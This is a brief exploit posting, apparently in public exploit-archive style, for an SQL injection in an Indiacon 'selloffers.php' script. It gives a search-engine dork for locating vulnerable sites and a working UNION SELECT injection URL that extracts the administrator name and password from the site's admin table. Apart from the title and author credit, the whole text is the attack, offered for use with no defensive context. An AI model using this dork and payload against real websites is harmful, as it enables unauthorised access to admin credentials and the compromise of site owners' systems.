Indiacon selloffers.php - SQL
Dork : inurl:selloffers.php?cid= "Powered by indiacon.com"

Exploite:
www.victim.com/selloffers.php?cid=9/**/union/**/select/**/1,concat(sb_admin_name,0x3a,sb_pwd),3,4,5,6,7,8/**/from/**/auto_admin

by
Ehsan_Hp200